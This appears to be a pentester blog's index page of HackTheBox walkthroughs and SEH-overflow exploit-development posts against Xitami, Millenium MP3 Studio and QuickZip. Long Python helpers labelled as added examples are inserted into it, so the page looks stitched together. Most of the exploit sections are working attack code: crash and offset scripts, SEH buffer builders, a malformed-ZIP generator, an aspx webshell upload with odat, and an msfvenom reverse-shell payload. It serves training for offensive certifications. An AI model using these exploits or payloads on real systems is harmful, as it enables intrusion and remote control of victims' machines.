Nmap. SMB shares: get the file and unzip it; SQL credentials are found in vbaProject.bin. Use Impacket's mssqlclient script to log in. Try to enable xp_cmdshell, but the current user is not privileged. Try to steal credentials by making the SQL server connect to a fake share on your own host; listen with Responder and crack the captured hash with john. Login again as… Continue reading HTB – Querier Walkthrough
Author: admin
Exploit Development: Xitami Webserver 2.5 – SEH + Egghunter
Fuzzing the GET HTTP request:
GET / HTTP/1.1
Host: 192.168.1.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMT
Cache-Control: max-age=0

Create a fuzzing script with boo-gen from the saved HTTP request:
python boo-gen.py get.txt

Vulnerable field: If-Modified-Since: Wed, <fuzzing-payload>

s_string("If-Modified-Since: Sat,", name="If-Modified-Since", fuzzable=False)
s_delim(" ", name="space-10", fuzzable=False)
s_string("15 Jun 2019 01:36:09… Continue reading Exploit Development: Xitami Webserver 2.5 – SEH + Egghunter
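The excerpt above keeps the header name fixed and fuzzes only the date string after "Sat,". The following is an added example, not the boo-gen/boofuzz script from the original post: a small sequential fuzzer that builds the same request shape with a length ladder for the date field and reports a case as suspicious when the server stops answering. The host 192.168.1.9 is taken from the request above; port 80, the length ladder and the crash heuristic are assumptions.

```python
"""
Sequential header fuzzer for the If-Modified-Since date field.
Added example, not the original post's boo-gen/boofuzz script.
Host is the excerpt's 192.168.1.9; port 80 and the case generation
strategy are assumptions.  Nothing is sent unless send_case() is called.
"""
import socket

HOST, PORT = "192.168.1.9", 80   # host from the excerpt; port assumed

# Fixed request skeleton; only {date} is fuzzed, matching the excerpt's
# s_string(..., fuzzable=False) / fuzzable date split.
TEMPLATE = (
    "GET / HTTP/1.1\r\n"
    "Host: {host}\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Connection: close\r\n"
    "If-Modified-Since: Sat, {date}\r\n"
    "\r\n"
)


def fuzz_lengths(max_len=5000):
    """Boofuzz-like length ladder: powers of two plus the values just
    below and above each, so an overflow at a boundary is hit early."""
    lengths = set()
    n = 1
    while n <= max_len:
        lengths.update(x for x in (n - 1, n, n + 1) if 0 < x <= max_len)
        n *= 2
    lengths.add(max_len)
    return sorted(lengths)


def build_request(date, host=HOST):
    """Render one request with the given date string (bytes, CRLF line ends)."""
    return TEMPLATE.format(host=host, date=date).encode("latin-1")


def fuzz_cases(max_len=5000, fill="A"):
    """Yield (payload_length, request_bytes) for every length in the ladder."""
    for n in fuzz_lengths(max_len):
        yield n, build_request(fill * n)


def send_case(req, host=HOST, port=PORT, timeout=3.0):
    """Send one case.  Returns True if the server answered with anything;
    False (connect error or empty reply) is the crash indicator to verify
    in the debugger, it is not proof by itself."""
    try:
        with socket.create_connection((host, port), timeout) as s:
            s.sendall(req)
            return bool(s.recv(1024))
    except OSError:
        return False


if __name__ == "__main__":
    for length, req in fuzz_cases():
        if not send_case(req):
            print("no response at payload length", length)
            break
```

Run it against the lab box only; once a length stops the service, reproduce that single case with a cyclic pattern instead of "A"s to get the SEH offsets.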
Exploit Development: Millenium MP3 Studio – SEH (WinDBG)
Crash:
#!/usr/bin/python
file = "kalisa.mpf"
buffer = "http://" + "A" * 5000
f = open(file, 'w')
f.write(buffer)
f.close()

Offset:
#!/usr/bin/python
file = "kalisa.mpf"
buffer = "http://" + "A" * 4105 + "B" * 4 + "C" * 1000
f = open(file, 'w')
f.write(buffer)
f.close()

pop-pop-ret

Stack:
nseh (4 bytes)
seh (4 bytes)
other (4 bytes)
other (4 bytes)
other (4 bytes)
other (4 bytes)
hole (4 bytes)
other (4 bytes)
shellcode starts here

So "jmp… Continue reading Exploit Development: Millenium MP3 Studio – SEH (WinDBG)
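The two scripts above find the crash length and the offset by hand. The following is an added example, not the original post's code: it generates a cyclic pattern to read the nSEH/SEH offsets straight from the debugger, then lays the file out as junk, nSEH (short jump), SEH (pop/pop/ret), NOP gap, shellcode. The "http://" prefix, the file name kalisa.mpf and the 4105-byte offset are taken from the excerpt (which of the two 4-byte fields that offset hits must still be confirmed in WinDBG); the pop/pop/ret address 0x41424344, the gap size and the INT3 placeholder shellcode are assumptions.

```python
"""
SEH overwrite layout helper for the .mpf file-format bug above.
Added example, not the original post's script.  Values taken from the
excerpt: prefix "http://", file name "kalisa.mpf", offset 4105.
Assumed placeholders: pop/pop/ret address 0x41424344, INT3 shellcode.
"""
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1Aa2... truncated to length."""
    chunks, size = [], 0
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                chunks.append(up + lo + dg)
                size += 3
                if size >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]   # length > 20280: pattern exhausted


def pattern_offset(value, length):
    """Offset of a 4-byte value seen in the debugger, given as ASCII
    ('2Aa3') or as the little-endian dword (0x33614132); -1 if absent."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("ascii")
    return pattern_create(length).find(value)


JMP_SHORT_6 = b"\xeb\x06\x90\x90"   # nSEH: jmp short +6 skips the SEH dword


def build_seh_buffer(prefix, nseh_offset, ppr_addr, shellcode,
                     total_len, gap=0):
    """prefix + junk + nSEH + SEH + NOP gap + shellcode, padded with 'C'
    to total_len bytes after the prefix, like the crash file.
    nseh_offset is measured from the end of prefix.  The short jump lands
    right after SEH and slides over the NOP gap; if the bytes after SEH
    are clobbered (the 'hole' in the excerpt's stack view), put a second
    jump over them there instead of NOPs."""
    body = b"A" * nseh_offset
    body += JMP_SHORT_6
    body += struct.pack("<I", ppr_addr)      # SEH handler -> pop/pop/ret
    body += b"\x90" * gap + shellcode
    if len(body) > total_len:
        raise ValueError("layout exceeds the crashing length")
    return prefix + body + b"C" * (total_len - len(body))


def write_file(path, data):
    """Write the buffer as raw bytes (text mode would mangle \\x0a etc.)."""
    with open(path, "wb") as f:
        f.write(data)
    return len(data)


if __name__ == "__main__":
    # Step 1: replace the 'A's with a pattern, crash, read SEH in WinDBG.
    write_file("kalisa.mpf", b"http://" + pattern_create(5000).encode())
    # Step 2: with the offsets known, build the real layout.
    buf = build_seh_buffer(b"http://", 4105, 0x41424344, b"\xcc" * 4, 5000)
    write_file("kalisa.mpf", buf)
```

Reading SEH as 0x33614132 in the debugger gives pattern_offset(0x33614132, 5000) == 8; the excerpt's 4105 would be recovered the same way from the real crash value.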
HTB: Silo
Enumeration: nmap, SID enumeration, password guessing with odat. Uploading an aspx shell for command injection:
./odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot\' 'shell.aspx' /usr/share/webshells/aspx/cmdasp.aspx --sysdba

Reverse shell: alternatively, create an msfvenom payload for a reverse shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > lisa.aspx

Upload the file:
./odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U… Continue reading HTB: Silo
SEH + Egghunter QuickZip Exploit
Initial Script:
#!/usr/bin/python
header_1 = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")
header_2 = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00"
            "\x24\x00\x00\x00\x00\x00\x00\x00")
header_3 = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
            "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")
payload = "A" * 4064
payload += ".txt"
exploit = header_1 + payload + header_2 + payload + header_3
myfile = open('kalisa.zip', 'w')
myfile.write(exploit)
myfile.close()

Crash: open the zip file, attach Immunity, try to extract (where the crash happens). Offset. SEH Chain. After Shift + F9, SEH chain again. Offset. EIP Control. POP-POP-RET… Continue reading SEH + Egghunter QuickZip Exploit
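The script above hard-codes the three ZIP records, including the name length 0x0fe4 (4068 = 4064 "A"s plus ".txt"), which has to be kept in sync by hand when the payload changes. The following is an added example, not the original post's code: a minimal ZIP writer that packs the local file header, central directory entry and end-of-central-directory record with struct and derives every length and offset from the entry itself, then parses the result back with Python's zipfile to confirm the archive is well formed before it is handed to the target. The DOS time/date words 0xacb7/0x34ce and the output name kalisa.zip follow the excerpt; the attribute values and the hello.txt sample entry are assumptions.

```python
"""
Minimal single-entry ZIP writer for the QuickZip test file.
Added example, not the original post's script.  From the excerpt:
mod time/date 0xacb7/0x34ce, entry name "A"*4064 + ".txt", output
"kalisa.zip".  Attribute words and sample data are assumptions.
"""
import io
import struct
import zipfile
import zlib

LFH_SIG, CDH_SIG, EOCD_SIG = 0x04034b50, 0x02014b50, 0x06054b50
MOD_TIME, MOD_DATE = 0xacb7, 0x34ce   # DOS time/date words as in the excerpt


def local_file_header(name, data=b""):
    """30-byte local header (stored, no extra field) + name + data."""
    return struct.pack(
        "<IHHHHHIIIHH", LFH_SIG, 20, 0, 0, MOD_TIME, MOD_DATE,
        zlib.crc32(data) & 0xffffffff, len(data), len(data), len(name), 0,
    ) + name + data


def central_directory_header(name, data, local_offset):
    """46-byte central directory entry + name (no extra field/comment)."""
    return struct.pack(
        "<IHHHHHHIIIHHHHHII", CDH_SIG, 20, 20, 0, 0, MOD_TIME, MOD_DATE,
        zlib.crc32(data) & 0xffffffff, len(data), len(data),
        len(name), 0, 0, 0, 1, 0x20, local_offset,
    ) + name


def end_of_central_directory(entries, cd_size, cd_offset):
    """22-byte EOCD record: single disk, no archive comment."""
    return struct.pack("<IHHHHIIH", EOCD_SIG, 0, 0, entries, entries,
                       cd_size, cd_offset, 0)


def build_zip(name, data=b""):
    """Archive with one entry.  name is raw bytes: the overflowing
    filename (junk, nSEH, SEH, egg, shellcode) goes here unchanged."""
    lfh = local_file_header(name, data)
    cdh = central_directory_header(name, data, local_offset=0)
    return lfh + cdh + end_of_central_directory(1, len(cdh), len(lfh))


def long_name(junk_len=4064, suffix=b".txt"):
    """Entry name of the excerpt's shape: junk followed by an extension."""
    return b"A" * junk_len + suffix


def name_length_field(blob):
    """Name-length word of the local header (offset 26), for cross-checking."""
    return struct.unpack_from("<H", blob, 26)[0]


def eocd_cd_offset(blob):
    """Central-directory offset stored in the EOCD record (offset 16 in it)."""
    return struct.unpack_from("<I", blob, len(blob) - 22 + 16)[0]


def parse_back(blob):
    """Well-formedness check: zipfile must list and read exactly our entry."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return [(i.filename, i.file_size, zf.read(i)) for i in zf.infolist()]


if __name__ == "__main__":
    archive = build_zip(long_name())
    with open("kalisa.zip", "wb") as f:
        f.write(archive)
```

Because the records are derived rather than copied, swapping the 4064 junk bytes for the real nSEH/SEH layout changes only the name argument; the excerpt's hand-maintained \xe4\x0f fields come out as len(name) automatically.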
My OSCE Experience
Hi guys, after OSCP and OSWP, I finally got my OSCE certification as well. I'm continuing with my personal plan to complete all Offsec certs and just got another beast! As always, I wanted to share my experience and personal studies for OSCE. Status before OSCE: I was capable of exploiting basic buffer overflows and had a solid understanding… Continue reading My OSCE Experience
OSWP – Second OffSec Certificate of 2019
Hi all, I've written about my OSCP journey before and it seems like it helped many people find their way. So I've decided to write a blog post on OSWP, too. Intro: I registered for the OSWP course on 23 July. Before I registered I bought the necessary devices, which were exactly the ones listed on the Offensive Security website. Since… Continue reading OSWP – Second OffSec Certificate of 2019
Finally OSCP – May the force be with you!
Since I passed my OSCP exam last week on my 1st attempt, I thought it'd be good to share my experiences and help others who ask for a roadmap. I'll try to include as many resources as I can. My background: I worked as a web pentester for one year. Then I decided to learn other… Continue reading Finally OSCP – May the force be with you!